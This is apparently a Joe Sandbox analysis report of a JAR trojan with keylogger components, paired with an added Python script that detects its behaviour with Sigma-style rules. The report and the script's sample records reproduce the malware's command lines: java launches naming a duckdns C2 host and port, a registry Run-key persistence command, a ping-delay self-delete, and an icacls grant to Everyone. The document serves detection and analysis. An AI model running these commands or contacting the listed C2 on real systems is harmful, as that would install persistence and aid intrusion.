Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe | Code function: 25_2_64102810 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
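The process-creation entries in this section show the whole persistence and clean-up chain: java.exe spawns cmd.exe, reg.exe writes a Run value that relaunches the copied JAR with javaw -jar, cmd.exe uses ping localhost -n 6 as a sleep before deleting the dropped JAR, and icacls grants Everyone modify rights on a ProgramData path; the three java -jar launches also carry the C2 host and port on the command line. The Python below is an added example, not Joe Sandbox's or Sigma's code: it implements checks modelled on three public Sigma rules (Register Jar In Run Key, Potential Persistence Attempt Via Run Keys Using Reg.EXE, Shell Process Spawned by Java.EXE) plus the ping-sleep/self-delete and icacls patterns, runs them over Sysmon-style process-creation records constructed from the command lines above, and extracts the C2 parameters from the java launches. The argument layout host, port, campaign name, second IP, mode is inferred from the three launches in this report, and the dynamic-DNS suffix list is illustrative; both are assumptions.

```python
import re
from dataclasses import dataclass

# Added example: detections modelled on the Sigma rules "Shell Process Spawned by
# Java.EXE", "Potential Persistence Attempt Via Run Keys Using Reg.EXE" and
# "Register Jar In Run Key", plus the ping-sleep/self-delete and icacls behaviour.
# Not the sandbox's or Sigma's own implementation.

RUN_KEY_RE = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(once)?\b")
JAR_LAUNCH_RE = re.compile(r'(?i)javaw?(\.exe)?\\?"?\s+-jar\s')
# "ping localhost -n 6 > nul && del <file> /f": ping as a sleep, then self-deletion
PING_DEL_RE = re.compile(r"(?i)\bping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+.*&&\s*del\b")
ICACLS_EVERYONE_RE = re.compile(r'(?i)/grant\s+"?everyone"?:')
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net")  # assumption: illustrative list


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def split_windows_args(cmdline):
    """Minimal Windows-style argv splitter: whitespace separates arguments, double
    quotes group them, backslashes are literal (so paths survive) except that \\"
    is an escaped literal quote, which is how the reg add data above is written."""
    args, cur, in_quote, have_tok, i = [], [], False, False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline) and cmdline[i + 1] == '"':
            cur.append('"')
            have_tok, i = True, i + 2
            continue
        if ch == '"':
            in_quote, have_tok = not in_quote, True
        elif ch.isspace() and not in_quote:
            if have_tok:
                args.append("".join(cur))
                cur, have_tok = [], False
        else:
            cur.append(ch)
            have_tok = True
        i += 1
    if have_tok:
        args.append("".join(cur))
    return args


def extract_jar_launch(cmdline):
    """For 'java -jar <jar> <host> <port> ...' return the C2 parameters, else None.
    Assumption: the layout host, port, campaign, second IP, mode is inferred from
    the three launches in this report."""
    args = split_windows_args(cmdline)
    if "-jar" not in args:
        return None
    i = args.index("-jar")
    rest = args[i + 2:]
    if len(rest) < 2 or not rest[1].isdigit():
        return None
    return {
        "jar": args[i + 1],
        "c2_host": rest[0],
        "c2_port": int(rest[1]),
        "dynamic_dns": rest[0].lower().endswith(DYNDNS_SUFFIXES),
        "extra_args": rest[2:],
    }


def detect(ev):
    """Return the names of the rules that fire on one process-creation event."""
    hits = []
    parent, img, cl = ev.parent_image.lower(), ev.image.lower(), ev.command_line
    if parent.endswith(("\\java.exe", "\\javaw.exe")) and img.endswith(("\\cmd.exe", "\\powershell.exe")):
        hits.append("shell_spawned_by_java")
    if img.endswith("\\reg.exe") and re.search(r"(?i)\badd\b", cl) and RUN_KEY_RE.search(cl):
        hits.append("reg_add_run_key")
        if JAR_LAUNCH_RE.search(cl):  # the Run value itself starts a JAR
            hits.append("jar_in_run_key")
    if img.endswith("\\cmd.exe") and PING_DEL_RE.search(cl):
        hits.append("ping_sleep_then_delete")
    if img.endswith("\\icacls.exe") and ICACLS_EVERYONE_RE.search(cl):
        hits.append("icacls_grant_everyone")
    return hits


# Constructed Sysmon-style records built from the command lines in this report.
JAVAPATH = r"C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe"
JAVA = r"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
REG_DATA = r'"\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""'
SAMPLE_EVENTS = [
    ProcEvent(JAVAPATH, JAVA, r'"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar'),
    ProcEvent(JAVA, CMD, r"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d " + REG_DATA),
    ProcEvent(CMD, r"C:\Windows\SysWOW64\reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d " + REG_DATA),
    ProcEvent(JAVA, CMD, r'cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f'),
    ProcEvent(JAVAPATH, r"C:\Windows\SysWOW64\icacls.exe", r'C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M'),
    ProcEvent(r"C:\Windows\explorer.exe", CMD, "cmd /c echo hello"),  # benign control record
]


def analyse(events):
    """Apply the rules to every event and collect C2 parameters from java launches."""
    findings = [(ev.image.rsplit("\\", 1)[-1], detect(ev)) for ev in events]
    c2 = [cfg for ev in events if ev.image.lower().endswith(("\\java.exe", "\\javaw.exe"))
          for cfg in [extract_jar_launch(ev.command_line)] if cfg]
    return findings, c2


if __name__ == "__main__":
    findings, c2 = analyse(SAMPLE_EVENTS)
    for name, rules in findings:
        print(f"{name:12} {', '.join(rules) or '-'}")
    for cfg in c2:
        print("C2:", cfg["c2_host"], cfg["c2_port"], "(dynamic DNS)" if cfg["dynamic_dns"] else "")
```

Two of the rules fire on the same event here: the cmd.exe that runs ping and del is flagged both as a shell spawned by java.exe and as the ping-sleep/self-delete pattern, which is the kind of corroboration that lets a rule as generic as the first one stay low-severity on its own. On real telemetry the records would come from Sysmon Event ID 1 or an equivalent EDR process-creation stream rather than the constructed list.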
ATT&CK Matrix (a number in parentheses is the report's signature-match counter for that technique; techniques without one are part of the matrix template and did not match)

Tactic | Techniques
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution | Command and Scripting Interpreter (1); Native API (1); Exploitation for Client Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence | Registry Run Keys / Startup Folder (1); Services File Permissions Weakness (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation | Process Injection (12); Registry Run Keys / Startup Folder (1); Services File Permissions Weakness (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items
Defense Evasion | Masquerading (1); Modify Registry (1); Disable or Modify Tools (1); Process Injection (12); Obfuscated Files or Information (2); Services File Permissions Weakness (1); DLL Side-Loading (1)
Credential Access | Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery | System Time Discovery (1); Security Software Discovery (1); Process Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (11); System Information Discovery (23); Remote System Discovery
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection | Input Capture (21); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control | Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1656232; sample: Avisierung vom 03.04.2025 K...; start date 04/04/2025; architecture: WINDOWS; score: 84)

Sample-level signatures: Malicious sample detected (through community Yara rule); Sigma detected: Register Jar In Run Key; Exploit detected, runtime environment starts unknown processes; 3 other signatures. On the domain jegjav.duckdns.org: Uses dynamic DNS services.

Network contacts (made by the first java.exe):
  jegjav.duckdns.org = 128.90.145.126, remote port 1967, local port 49716, PHMGMT-AS1US, United States
  ip-api.com = 208.95.112.1, remote port 80, local port 49717, TUT-ASUS, United States

Process tree (the numeral after a process name is the graph's created-file / registry-value counter):
  java.exe (32)
    dropped: C:\Users\user\...\Q80nzDuO6Y2mTZi9wfDuL.jar (Java); C:\Users\user\...\7zgl6mWD4hExxxjOoeVcv.jar (Java); C:\Users\user\AppData\Local\...\paexec.exe (PE32)
    java.exe (4)
      dropped: Avisierung vom 03....nnummer 1084472.jar (Java)
      cmd.exe (1) [Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks]
        conhost.exe
        reg.exe (1)
      cmd.exe (1)
        conhost.exe
        PING.EXE (1)
      conhost.exe
    java.exe (8)
      dropped: C:\...\systemhook-4400567111608641391.dll (PE32); C:\Users\...\systemhook+4014254877.dll (copy) (PE32)
      cmd.exe (1)
        conhost.exe
        PING.EXE (1)
      cmd.exe
        conhost.exe
        PING.EXE (1)
      conhost.exe
    java.exe (3)
      conhost.exe
    2 other processes
      conhost.exe
  7za.exe (9)
    conhost.exe

Source | Detection | Scanner | Label
Avisierung vom 03.04.2025 Kundennummer 1084472.jar | 3% | Virustotal |
Avisierung vom 03.04.2025 Kundennummer 1084472.jar | 11% | ReversingLabs | Binary.Trojan.Generic
SAMPLE | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\lib\paexec.exe | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dll | 0% | ReversingLabs |

No Antivirus matches

Source | Detection | Scanner | Label
http://www.allatori.comu | 0% | Avira URL Cloud | safe
http://www.allatori.como | 0% | Avira URL Cloud | safe
http://www.allatori.com# | 0% | Avira URL Cloud | safe
http://www.allatori.comdlly | 0% | Avira URL Cloud | safe
https://www.poweradmin.com0 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jegjav.duckdns.org | 128.90.145.126 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://java.oracle.com/ | java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1368038319.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000017.00000002.2304286299.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://null.oracle.com/ | java.exe, 00000003.00000003.1566322429.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2475357557.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363389065.0000000014F84000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363515756.0000000014F8B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363630443.0000000014F9C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.allatori.com | Avisierung vom 03.04.2025 Kundennummer 1084472.jar.12.dr | false | | high
http://www.apache.org/licenses/ | jna-platform-5.5.0.jar.3.dr | false | | high
http://www.allatori.com# | java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.allatori.comu | java.exe, 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.allatori.comdlly | 7za.exe, 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.poweradmin.com0 | java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bugreport.sun.com/bugreport/ | java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.allatori.como | java.exe, 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gnu.org/licenses/licenses.html | java.exe, 00000003.00000003.1537919401.0000000015637000.00000004.00000020.00020000.00000000.sdmp, jna-platform-5.5.0.jar.3.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
128.90.145.126 | jegjav.duckdns.org | United States | 22363 | PHMGMT-AS1US | true
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1656232
                                      Start date and time:2025-04-04 06:59:05 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 58s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Cookbook file name:defaultwindowsfilecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Without Tracing
Number of new started processes analysed:34
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Avisierung vom 03.04.2025 Kundennummer 1084472.jar
                                      Detection:MAL
                                      Classification:mal84.troj.expl.evad.winJAR@36/25@5/2
                                      EGA Information:
                                      • Successful, ratio: 25%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .jar
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target java.exe, PID 2964 because it is empty
                                      • Execution Graph export aborted for target java.exe, PID 5540 because it is empty
                                      • Execution Graph export aborted for target java.exe, PID 7728 because it is empty
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Report size getting too big, too many NtWriteFile calls found.
                                      No simulations
                                      No context
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):52
                                      Entropy (8bit):4.834679141051596
                                      Encrypted:false
                                      SSDEEP:3:oFj4I5vpm4USnxkLn:oJ5bnAn
                                      MD5:820A51136103187466669F3549214450
                                      SHA1:F1F6A6F179214713FC76DC87FE7689CDC7352AB2
                                      SHA-256:70469350DB6EF612513EEF2E2B1E3A4248BBA2160EEFBBE18744AE837B7A297A
                                      SHA-512:FEC2CFBD27F5506983CE5FA2EF2E1DF3C314751C28A682BE59DD51C8B0E0ED12E9163950675C23FB263DC9E3737E88DFB3F9D522AE5374C0EC2246AFDE1F92A2
                                      Malicious:false
                                      Preview:C:\Program Files (x86)\Java\jre-1.8..1743742918187..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2796
                                      Entropy (8bit):7.74055941239173
                                      Encrypted:false
                                      SSDEEP:48:9DtpMQU//Lm3Bec4NffvnGo1XVN1+w3iEYil/8qzQEr8njBeju6OOPtrFk8kUi1T:tIE3enGo1XV//3miZ0XMnVrq8CAUUEbV
                                      MD5:A54F66492FD94668EF51A545D292F0B1
                                      SHA1:5CA2E82ACD0E62C3C97FD9B16A27DA7FF88B68BA
                                      SHA-256:BDC068FBF030308A87B3C9A7FEA487EF12B1DF34290D617CC4B103F1FD7E27C7
                                      SHA-512:4916264091C45CD95E408EBBC7B08812479A4E77FD3A3036D95351E36516F8465A62089F20869DE89F4B69F9B15F159D27BDB894B4C657C0CAECE4436C64D496
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar, Author: Joe Security
                                      Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.... ...]...k0..q.A.Z.....s....".|!w.#qn.+;.).!tLzy~p.9fg....Uht7...Q....P...r.R.BK(../PK..a..U]...`...PK...........Z................InstallerCode.class.WI`......=c..[...!2.A6..LX.....e....C.<.%F3.4.nH..t_.n.M..)-m.V.1..5m.....z.6q.7Z,..B-......~...ko.x..a...ME..T...`.UqeH.5E....1.,a`a"n....:..F..h.dx..hc..XLS....N0.W..:..D..3t."..RR....3.*..v..=1=f>.P.U....c.R,c....1K.T.Q.I.......F.>.rwOK.....c9V2,/p,.....N.L.A ......k.X.....4.9.A...Z..%.)........E.C..R..w.f..].)cX.sD=?9....p..A.H.-..t.....<;...V J...M.*.i..kdL...mG.>..F...J4`.+k.....S...x*=...#...>...P.5.....\.....,..S...h..4..v.......k.......5...XR...{..2$u...6./.Iitw......M.........\..s..........;.p..Q)b..C.E..v....eG.v..sI...C......f1.T..b..{.D..W...E.0,....TS.......XX-......4..0...K}.{Qs}8l.!.Q...+.^SD;..1t.*4......%.P.3....v.N...G...DxK&...)..;.x......F5~.*...O.a....o....n..
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):11108
                                      Entropy (8bit):7.907426955263712
                                      Encrypted:false
                                      SSDEEP:192:7pawDRaWMYXGm263/+vsm1V9QObYWwevvJbmeU2uDYunhqBHr9t6rSVU1Ls5c5l8:7pawdaWXvWsm1EO8WPBmeUVk7Hrr6rSh
                                      MD5:D0A0C0C43784CB4C27038A4A3E23F2BA
                                      SHA1:525C51436633938E49AB44BA9F2BAD9CEAF54C13
                                      SHA-256:DB2C3F5A4745E129B2E4FB90766C4893C7D93423C16A3360797845B77561176F
                                      SHA-512:22A0678ED068A7E3B846EE32CDC9FE6403D2330AEAFF11F68C7BBEAD5A86FB27BBAD5F65E8956FC5E1EB1964AB180270E552F568C85A96053207B5A184589D98
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar, Author: Joe Security
                                      Preview:PK........ihsZ................META-INF/......PK..............PK........ihsZ................META-INF/MANIFEST.MFU.1..0.F.&...u..!$.Q.d.N......G....,..{..k1..b..It.j..L.F..=`?.Ae.kQ.fs..{2...i..1F8cz.....1..O.........P.;.#....Z..U...Z..f.}Orxk...PK....Z.........PK........ihsZ................k.class;.o.>.....NF..lv.FF....D...t}......v.f.d2#.....c...g....?#...f.#.Wp~iQr.[fN*........0.02.1..X... qV.PK..../f...l...PK........ihsZ................KeyloggerEx.class.Z.@[..>.!........t.6`...cd...F`c...#$,.c...n...L.4..&m.f.....iHW..u..{...M.......m....w...s....z..nR..2..3.PO...=m$f.:.;.+...=...N..Q#.0q7...@Ad(Xp".+.....C.......n..........t...k$..A,..]F.`../x*...W..!.^_..P#.\.P....0...S.......}8.K......\}.h9.Y].....h./.S....i...]C}.......{....k;.j.\...j..5-..Z,..2....~.E.@_.`O_@m..E%I.cZz..zT..[3{.[.i.p=...B...]......k..`....hAs.._.b0Ut...}.L).\..RiY:).k..Z.a.5Z+.BK.V.....B.h.x..dM..:....25.V(.B.P)..TB.,.CV...l.b+.xjOw...P.H;..f.ub.BU.F.....7...A....h(|.H
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:Java archive data (JAR)
                                      Category:dropped
                                      Size (bytes):2662
                                      Entropy (8bit):7.74777446023506
                                      Encrypted:false
                                      SSDEEP:48:9XYe5NKxPuHiPLDgDK0DP7bLQbb+NSC0u4+jcefSHQ++P7qYZKppk6gc:r5kkuLyZn83fu44NZJP7jZKk6gc
                                      MD5:7FC5D32903CCFB588148C41481292EEA
                                      SHA1:098C980CB39F5DE6535D3E5339DEF97157DB8735
                                      SHA-256:DDFAFE23DB3BC32D6F53B255FDCE6A0A7815146D163D4C00A0F4A15EAFEF82FF
                                      SHA-512:43FA783F6A2783ECE97FF6337068C823DC0E75FDCD45988BE5C5656D72F5D3BF9FC95B79CE2D9AABCF8167F1EBED41A3559983B79F8B5827B41DFEF93CF69FFA
                                      Malicious:false
                                      Preview:PK.........~XZ................META-INF/......PK.........VeZy_..y...........META-INF/MANIFEST.MFE.... ..w.....4.I.umtr5..x..9n..[.t.~FL4.*p.\)'oZ..8..........4'.{.f.\2...fm#..g..7.n.9!t.....?R"...WZ.H...7./..VoPK.........TeZ...[Q...........DpApi.class.Wkx.e.....%..:..[vrtc.'2.-.tn4].uK...`.0.&_.lI......T.P<!.."......R......._.........6...ak.q.+y.....~...W^..`;..C....*\p..8...B.-...M.....{W:..v.8..G.x.\{.......Y.B.-.kR...G.b..K..y+m....;..k.G-3.K...z...X..V.~...W..PT+....>..WO.I..X.l.-%.R..&4+X.b..T.f.49i......:..a..+.b#>.H.^..f....F~vhz.|...ND..lF...h.f.oR.}4|L`5..[cK...v....;T..Z6..cp..\..vt(.Tq'B....Y...F.Fi.D.N8..(..t...Eh..-Xz. 1..LS.5m...g.[...c4u..h1...>... B..l....S.G..2.....lK.E..R.q.f.H.......L..z<..Nm..*.....j......>.Wp@......c.....L...S..1.*...............g4k.0....\wW.O...u......8....'.....x.!..0F.?F%..nn..#U....3..NP..@.0.q..*&q...V....3}vZ...xp.J$fL#.KfM...\../j....T..:....z2.{@..#....i..L..WO.tM..H3'cFB.L.7.TF....<R..M.v7.Z.E>..{..`:a.
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.275778370270322
                                      Encrypted:false
                                      SSDEEP:96:wjPrtU8Gd8XomS6rnI28Ij/STLHG1bowmb:wju8Gd8XomS6oI+XHGd
                                      MD5:1B44B5CD529382D3702BF106E2C94D10
                                      SHA1:6AA8BE28C7D09E731C3150473697A219A633067D
                                      SHA-256:397D951B3E851FDE2616F8A7DF6FEA2BD9E6396711507714B8515FA6243BD3BC
                                      SHA-512:AE11B3D253ADBD904BBCF9633D790580FC24352CA53DC43362F4007A3A086B2EABA2AF7634058F8D0C7A585769FEC95E31BDF0BC8FB0D2E317879C538AD47401
                                      Malicious:false
                                      Preview:........P9.......Q...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2802310005980957
                                      Encrypted:false
                                      SSDEEP:96:IpxrzX8GEZDYv655tq6rgTI28InaFSTgHG1bow75:IpJ8GgYva5tq6hIrEHGd
                                      MD5:E2AAEF9EA57694E080487A163ED3D944
                                      SHA1:DC64DB92B36ED0AE772E0C540B94CF30C1A47C2A
                                      SHA-256:E95CBCDF1248BFB7171E4BF4A4B8D9F249E12971DCDF95DEFBF2CCD5222ACF72
                                      SHA-512:995AE34A48F5255C97A1AAEC37F2AAA31CA6157402E81A55594EB66A760D995EE0793C9FF191EA18304A9AB15358E3173B218A57F100848AF8D0A42BECA14F23
                                      Malicious:false
                                      Preview:........h9.............. .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2795675974819485
                                      Encrypted:false
                                      SSDEEP:96:ajPrCGs8GrSgqy0xY6rII28IO/STePHG1bowGZy:aj28Ge7y0xY6hIJQHGd
                                      MD5:E9D97C416B7FB1CF248CA0612E06965E
                                      SHA1:605AFE3FA28E7E6555BC2659243820B661AF629D
                                      SHA-256:3C7F1B31E26C7E11CC321B6C5F9FEDA9E86E95C03FDA2C6063C359285F1E95A3
                                      SHA-512:E21FB30D692475ED785A7E8C7221801306A16FD4287D350D859AD80EBE92D2D38C853560E078774704E0F2AE96645DB3636C891AA9A96CE89C21B197A23654B1
                                      Malicious:false
                                      Preview:........`9......m~...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.2962891498247433
                                      Encrypted:false
                                      SSDEEP:96:2Dor9c78GnqZQCOxtUkJdIoqu1oUl47TOaHG1bow+4cp:2DT8GnqZQC2nzITmoUGLHGdQ
                                      MD5:7A72874EE72073E2859F9BA44B12A38D
